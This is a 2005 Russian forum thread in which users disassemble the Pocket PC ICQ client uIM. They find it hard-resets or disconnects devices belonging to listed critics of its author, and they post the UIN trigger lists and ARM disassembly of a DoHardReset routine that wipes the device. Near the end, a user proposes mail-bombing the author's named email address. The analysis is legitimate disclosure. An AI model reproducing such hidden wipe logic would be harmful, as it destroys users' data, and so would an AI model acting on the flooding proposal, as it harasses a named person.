uIM ICQ

DRazumny

ALL
Результат моих исследований и разбора на части программы другими людьми:
Автор программы вставил в ее код реакцию на определенные UIN.
На мой номер и номер G.LEX она реагирует ХР.
Видимо, автору не понравились наши высказывания.
На любой другой не засвеченый UIN реакция нормальная.

Вот такой Альбертик злобный человек

G.LEX · Сообщение **G.LEX** » Пт июл 29, 2005 23:23

Господин Хавинсон чтож вы так плохо замаскировали лист хард резета своих недругов

за 10 минут ковыряния uIM был извлечён сей список,который дублируется в проге неоднократно и лично мне 0 его обсолютно влом. Итак уины на которые прога делает хард резет :4156738
118064022
7431188
168688283
970140
77796666
67172737
706786
248373460
343855187
296163805
3354169
312012505
329186290
110052084
484638252
156363625
30136811
253618008
346323072
410559
1636605
340140
326162567
293162029
209615669
122145152
номера представлены в программе именно в этом порядке.
Господа с HPC.RU убедительная просьба убрать вирус ,а uIM является именно вредоносной програмой ( вирусом) с своих серверов для скачивания на паблик.

G.LEX · Сообщение **G.LEX** » Пт июл 29, 2005 23:38

А это список уинов на которые не происходит не каких действий, не ХР не конекта с инетом:
993300
303978913
22758799
253382685
336630953
261743246
270108181
215451254
5365897

G.LEX · Сообщение **G.LEX** » Пт июл 29, 2005 23:59

Код

.text:0001B2B0 dword_1B2B0 DCD 0x78504 ; DATA XREF: sub_1B0B0+158r
.text:0001B2B4 dword_1B2B4 DCD 0x4CED8 ; DATA XREF: sub_1B0B0+148r
.text:0001B2B8 dword_1B2B8 DCD 0x59658D ; DATA XREF: sub_1B0B0+118r
.text:0001B2BC dword_1B2BC DCD 0xCDF0B7A ; DATA XREF: sub_1B0B0+114r
.text:0001B2C0 dword_1B2C0 DCD 0x10210B19 ; DATA XREF: sub_1B0B0+110r
.text:0001B2C4 dword_1B2C4 DCD 0xFA16792 ; DATA XREF: sub_1B0B0+10Cr
.text:0001B2C8 dword_1B2C8 DCD 0x141819AD ; DATA XREF: sub_1B0B0+108r
.text:0001B2CC dword_1B2CC DCD 0x16AD18 ; DATA XREF: sub_1B0B0+104r
.text:0001B2D0 dword_1B2D0 DCD 0xF21D521 ; DATA XREF: sub_1B0B0+FCr
.text:0001B2D4 dword_1B2D4 DCD 0x74F4E84 ; DATA XREF: sub_1B0B0+F8r
.text:0001B2D8 dword_1B2D8 DCD 0xC860039 ; DATA XREF: sub_1B0B0+ECr
.text:0001B2DC dword_1B2DC DCD 0x1180D131 ; DATA XREF: sub_1B0B0+E0r
.text:0001B2E0 dword_1B2E0 DCD 0x13785D8B ; DATA XREF: sub_1B0B0+D4r
.text:0001B2E4 dword_1B2E4 DCD 0x207E01 ; DATA XREF: sub_1B0B0+B8r
.text:0001B2E8 dword_1B2E8 DCD 0xDC8C3 ; DATA XREF: sub_1B0B0+ACr
.text:0001B2EC dword_1B2EC DCD 0x162CA93 ; DATA XREF: sub_1B0B0+A4r
.text:0001B2F0 dword_1B2F0 DCD 0x14ABFD84 ; DATA XREF: sub_1B0B0+A0r
.text:0001B2F4 dword_1B2F4 DCD 0x1225DEA5 ; DATA XREF: sub_1B0B0+98r
.text:0001B2F8 dword_1B2F8 DCD 0xF256C5C ; DATA XREF: sub_1B0B0+94r
.text:0001B2FC dword_1B2FC DCD 0x1D35EEF ; DATA XREF: sub_1B0B0+88r
.text:0001B300 dword_1B300 DCD 0x959706D ; DATA XREF: sub_1B0B0+7Cr
.text:0001B304 dword_1B304 DCD 0xED565D8 ; DATA XREF: sub_1B0B0+74r
.text:0001B308 dword_1B308 DCD 0x1B56430 ; DATA XREF: sub_1B0B0+70r
.text:0001B30C dword_1B30C DCD 0x124DE6 ; DATA XREF: sub_1B0B0+68r
.text:0001B310 dword_1B310 DCD 0x696C7F8 ; DATA XREF: sub_1B0B0+64r
.text:0001B314 dword_1B314 DCD 0x4087E85 ; DATA XREF: sub_1B0B0+5Cr
.text:0001B318 dword_1B318 DCD 0x13A680F6 ; DATA XREF: sub_1B0B0+58r
.text:0001B31C dword_1B31C DCD 0x4AA9A3E ; DATA XREF: sub_1B0B0+50r
.text:0001B320 dword_1B320 DCD 0x12A073DD ; DATA XREF: sub_1B0B0+4Cr
.text:0001B324 dword_1B324 DCD 0x1652A0 ; DATA XREF: sub_1B0B0+44r
.text:0001B328 dword_1B328 DCD 0x3AB33D ; DATA XREF: sub_1B0B0+40r
.text:0001B32C dword_1B32C DCD 0xA157F9F ; DATA XREF: sub_1B0B0+38r
.text:0001B330 dword_1B330 DCD 0x11AE9EE1 ; DATA XREF: sub_1B0B0+34r
.text:0001B334 dword_1B334 DCD 0x78E918 ; DATA XREF: sub_1B0B0+2Cr
.text:0001B338 dword_1B338 DCD 0x14865557 ; DATA XREF: sub_1B0B0+28r
.text:0001B33C dword_1B33C DCD 0x711089A ; DATA XREF: sub_1B0B0+1Cr
.text:0001B340 dword_1B340 DCD 0x46F246 ; DATA XREF: sub_1B0B0+18r

после букв DCD - UIN'ы в шестнадцатеричном виде, в десятичку перевести - хоть калькулятором виндовым

сама процедура HR:

Код
text:0003754C
.text:0003754C
.text:0003754C DoHardReset ; CODE XREF: sub_1B0B0:loc_1B2A4p
.text:0003754C ; sub_20998:loc_20C48p ...
.text:0003754C
.text:0003754C var_18 = -0x18
.text:0003754C var_14 = -0x14
.text:0003754C
.text:0003754C STMFD SP!, {R4-R6,LR}
.text:00037550 SUB SP, SP, #8
.text:00037554 MOV R0, #0x7D0
.text:00037558 BL mfcce300_315
.text:0003755C MOV R2, #0x7D0 ; size_t
.text:00037560 MOV R1, #0x41 ; int
.text:00037564 MOV R5, R0
.text:00037568 BL memset
.text:0003756C MOV R6, #0
.text:00037570 STRB R6, [R5,#0x7CF]
.text:00037574 BL _AfxGetNewHandler__YAP6AHI_ZXZ; AfxGetNewHandler(void)
.text:00037578 MOV R4, R0
.text:0003757C LDR R2, =asc_4B8A4
.text:00037580 LDR R4, [R4]
.text:00037584 MOV R3, R5
.text:00037588 LDR R1, =asc_4B8A8
.text:0003758C LDR R4, [R4]
.text:00037590 MOV LR, PC
.text:00037594 MOV PC, R4
.text:00037598 LDR R3, =SetCleanRebootFlag
.text:0003759C LDR R0, [R3]
.text:000375A0 MOV LR, PC
.text:000375A4 MOV PC, R0 ; SetCleanRebootFlag();
.text:000375A8 LDR R4, =KernelIoControl
.text:000375AC MOV R3, #0
.text:000375B0 LDR R0, =0x101003C ; IOCTL_HAL_REBOOT
.text:000375B4 MOV R2, #0
.text:000375B8 LDR R4, [R4]
.text:000375BC MOV R1, #0
.text:000375C0 STR R6, [SP,#0x18+var_14]
.text:000375C4 STR R6, [SP,#0x18+var_18]
.text:000375C8 MOV LR, PC
.text:000375CC MOV PC, R4 ; KernelIoControl(IOCTL_HAL_REBOOT,...);
.text:000375D0 ADD SP, SP, #8
.text:000375D4 LDMFD SP!, {R4-R6,PC}
.text:000375D4; End of function DoHardReset

Хавинсон ты гнилой человек ,я забил всю эту шнягу и прога работает. Для тех кто увидел свои номера уинов завтра выложу леченый уим для скачки или пишите в ПМ.

ВадимП

Если приведенные G.Lex'ом факты соответствуют действительности, то программа действительно подпадает под определение классического "вредоносного кода".

Makoron

Нда... И мой уин там же- в разряде "не ХР не конекта с инетом", видимо результат культурной беседы с г. Хавинсоном в ветке Покетов. Итого, вывод: ежли вы посмели сказать слово против вышеупомянутого господина или его программы- не ставьте новые версии программы, ибо это чревато хардресетом...

dci · Сообщение **dci** » Сб июл 30, 2005 00:19

откройте идой(IDA) версию 1.80 и убедитесь.

Des · Сообщение **Des** » Сб июл 30, 2005 00:23

G.LEX писал(а):...
после букв DCD - UIN'ы в шестнадцатеричном виде, в десятичку перевести - хоть калькулятором виндовым ...

маленькая поправочка - список уинов начинается с
text:0001B2B8 dword_1B2B8 DCD 0x59658D ;
для получения собственно уина необходимо от значения отнять 0x78504. смотрел невнимательно, под впечатлением от увиденного

я всегда придерживался принципа "разработчик вам ничем не обязан и все IS DISTRIBUTED "AS IS". NO WARRANTY OF ANY KIND IS EXPRESSED OR IMPLIED. YOU USE AT YOUR OWN RISK."" но в данном случае яйца б оторвал.

Отвечать юридически за баги в бесплатно распостраняемой программе я морально готов.

сэру не кажется, что есть тонкая и неуловимая разница между "неисправностями тормозной системы" и "перерезаной гидролинией" ? то, что в случае uIM имеет место не баг, а именно вредоносный код - готов как эксперт подтвердить. Тем более, что eula'ой с отказом от гарантий прикрыться не удасться, т.к. не заметил я что-то этой eula при скачивании/установке. хотя с судом ессно врядли что-либо получится:
учитывая географию, к аффтору придраться будет нереально.
макцентр, если не идиоты, програму с download'a снимет.

G.LEX · Сообщение **G.LEX** » Сб июл 30, 2005 00:25

Makoron новая версия уже вылечена от всего этого говна, я за свои слова отвечаю.

Makoron

G.LEX Спасибо! Я написал для тех, кто захочет скачать uIM ещё откуда-нибудь... Мало ли, куда г. Хавинсон захочет выложить своё "произведение" для публичного скачивания...

G.LEX · Сообщение **G.LEX** » Сб июл 30, 2005 00:29

Вылеченая от падлянок хавинсоновских версия
Ваш файл uIM1.rar (размер 129 кбайт)

доступен по адресу: webfile.ru/431389 в течение 7 дней до 00:24 06.08.2005.

Леня

Des писал(а):
G.LEX писал(а):...
я всегда придерживался принципа "разработчик вам ничем не обязан и все IS DISTRIBUTED "AS IS". NO WARRANTY OF ANY KIND IS EXPRESSED OR IMPLIED. YOU USE AT YOUR OWN RISK."" но в данном случае яйца б оторвал.

И не только яйца

G.LEX · Сообщение **G.LEX** » Сб июл 30, 2005 03:37

Господин Хавинсон а не обьясните ли вы нам что за упоминания о некоем "picq" внутри кода вашей программы

Для тех кто не знает-Photon ICQ довольно древний проект, коды которого распростроняются по лицензии GPL,тоесть бесплатно но с обязательным указанием в абауте кому эти коды принадлежат.

DRazumny

Господа!
Предлагаю решить, как мы на это будем реагировать.
Юридически, морально, физически.

Мое мнение: география, к сожалению, юридически наказать его помешает.
Моральное удовлетворение я уже получил (спасибо G.LEX).
Можно пригласить Альбертика к нам в гости и объяснить "всю глубину наших глубин". Так не приедет ведь

Makoron

Он в программе свой ящик указал, albert_havs@yahoo.com. Ни у кого нет возможности закинуть туда тысяч 10 писем с обьяснением, кем на самом деле является Вуди, кем были его родители, особенностей его зачатия и сексуальной жизни, и что с ним надо было сделать сразу после рождения?